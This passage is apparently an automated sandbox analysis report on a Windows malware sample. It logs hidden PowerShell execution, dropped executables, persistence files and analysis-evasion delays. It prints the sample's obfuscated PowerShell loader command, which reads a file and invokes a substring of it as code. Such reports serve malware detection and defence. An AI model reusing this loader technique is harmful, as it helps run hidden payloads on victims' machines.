            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) "
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F93710 push 8BD38B50h; iretd 2_2_08F93716
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FA3CA0 push cs; retf 2_2_08FA3CB1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FA466D pushad ; retf 2_2_08FA466E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FA05D1 push esi; ret 2_2_08FA05D2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FA2BCA push ebp; iretd 2_2_08FA2BCC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FA2DCC push ebx; retf 2_2_08FA2DDE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FA03B4 push ds; ret 2_2_08FA03B6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FA2D85 push ebx; retf 2_2_08FA2DDE
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00189011 push edx; iretd 6_2_00189012
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_0018A031 pushad ; iretd 6_2_0018A032
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00189091 push ebx; iretd 6_2_00189092
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00189094 push ebp; iretd 6_2_00189462
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_0018A088 pushad ; iretd 6_2_0018A0EA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00189089 push ebx; iretd 6_2_0018908A
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_0018A0F1 pushad ; iretd 6_2_0018A0F2
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_0018A0E8 pushad ; iretd 6_2_0018A0EA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00189468 push esi; iretd 6_2_0018961A
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00188490 push edx; iretd 6_2_00188EEA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00188489 push eax; iretd 6_2_0018848A
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00188481 push ecx; iretd 6_2_00188482
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00189611 push edi; iretd 6_2_00189612
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00189DE0 pushad ; iretd 6_2_0018A02A
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00188EF1 push edx; iretd 6_2_00188EF2
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_016D2DCC push ebx; retf 6_2_016D2DDE
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_016D05D1 push esi; ret 6_2_016D05D2
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_016D2D85 push ebx; retf 6_2_016D2DDE
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_016D3CA0 push cs; retf 6_2_016D3CB1
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_016D2BCA push ebp; iretd 6_2_016D2BCC
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_016D03B4 push ds; ret 6_2_016D03B6
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_016D466D pushad ; retf 6_2_016D466E
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeFile created: C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeJump to dropped file
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.iniJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeAPI/Special instruction interceptor: Address: 2755974
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeMemory allocated: 1F3A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeMemory allocated: 213A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598453Jump to behavior
